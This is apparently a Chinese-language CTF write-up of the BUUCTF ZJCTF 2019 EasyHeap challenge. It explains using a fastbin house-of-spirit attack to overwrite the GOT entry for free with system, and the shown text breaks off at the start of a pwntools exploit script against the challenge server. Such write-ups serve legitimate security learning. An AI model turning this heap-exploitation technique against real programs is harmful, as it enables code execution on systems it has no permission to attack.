BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
这是第一次成功做出了堆题,说来惭愧这道题真的不难,但是研究了好久,堆也就一直没学明白,今天算是正式迈进了第一步吧,给自己加油!
这里可以看到partial relro,说明我们的got表是可以修改的
一般的堆题都是这种表单形式的
ida里我们可以看到这个函数,但是实践证明它无法执行,因为flag根本就不在这个目录下,但是提供给我们system函数了,这道题涉及到了fastbin attack里面的house of spirit漏洞,具体的大家可以去ctfwiki上面了解
我们的思路就是通过漏洞利用,修改got表里的free,将其修改为system函数,然后我们调用free时就执行了system了,附上exp,对于关键点进行了必要的说明
from pwn import *
sh = remote("node3.buuoj.cn","29244")
sh.sendafter('Your choice :','1\n') #heap0
sh.sendafter('Size of Heap : ','96\n')
sh.sendafter('Content of heap:','\n')
sh.sendafter('Your choice :','1\n') #heap1
sh.sendafter('Size of Heap : ','96\n')
sh